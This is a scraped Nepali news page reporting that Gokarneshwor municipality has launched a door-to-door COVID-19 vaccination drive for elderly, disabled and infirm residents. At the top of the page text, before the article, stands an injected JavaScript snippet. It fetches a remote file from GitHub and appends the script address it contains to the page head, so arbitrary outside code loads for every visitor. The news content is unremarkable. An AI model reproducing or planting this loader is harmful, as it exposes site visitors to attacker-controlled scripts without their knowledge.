;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोरोनाविरुद्धको खोप लगाउन गोकर्नेश्वोर न. पा. ले शुरु गर्यो ‘घरदैलो खोप अभियान’ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कोरोनाविरुद्धको खोप लगाउन गोकर्नेश्वोर न. पा. ले शुरु गर्यो ‘घरदैलो खोप अभियान’
Breaking News

कोरोनाविरुद्धको खोप लगाउन गोकर्नेश्वोर न. पा. ले शुरु गर्यो ‘घरदैलो खोप अभियान’

जुनेली न्यूज, काठमाण्डौ | गोकर्णेश्वर नगरपालिकाले कोरोनाविरुद्धको खोप लगाउन खोप केन्द्रसम्म जान नसक्ने ज्येष्ठ नागरिक, अपाङ्गता भएका र अशक्त व्यक्तिहरूलाई गोकर्णेश्वर नगरपालिकाले आजबाट ‘घरदैलो खोप अभियान’ शुरु गरेको छ ।

नगरप्रमुख सन्तोष चालिसे, वडा नं ६ का वडाध्यक्ष रमेश अर्याल, नगरपालिकाका स्वास्थ्य प्रमुख हरिप्रसाद उपाध्याय लगायत स्वास्थ्यकर्मीको टोलीले आज वडा नम्बर ६ को विभिन्न स्थानबाट यो अभियान शुरु गरेका हुन् ।
ज्येष्ठ नागरिक‚ अपाङ्गता भएका र अशक्तहरूका लागि घरदैलो अभियान शुरु गरेको यो अभियान आजबाट शुरु भएको र अब नगरपालिकाको सबै वडामा सञ्चालन हुने नगर प्रमुख चालिसेले बताएका छन् ।

खोप लगाउन खोप केन्द्रसम्म जान नसक्ने उल्लेखित समूहको आ-आफ्नो वडामा नाम ,उमेर, सम्पर्क नम्बर लगाएतका विवरण प्रकाशन भएको ३ दिन भित्र आ- आफ्नो वडा कार्यालयमा उपलब्ध गराउन उनले आग्रह गरेका छन् ।

 

फेसबुक प्रतिक्रियाहरु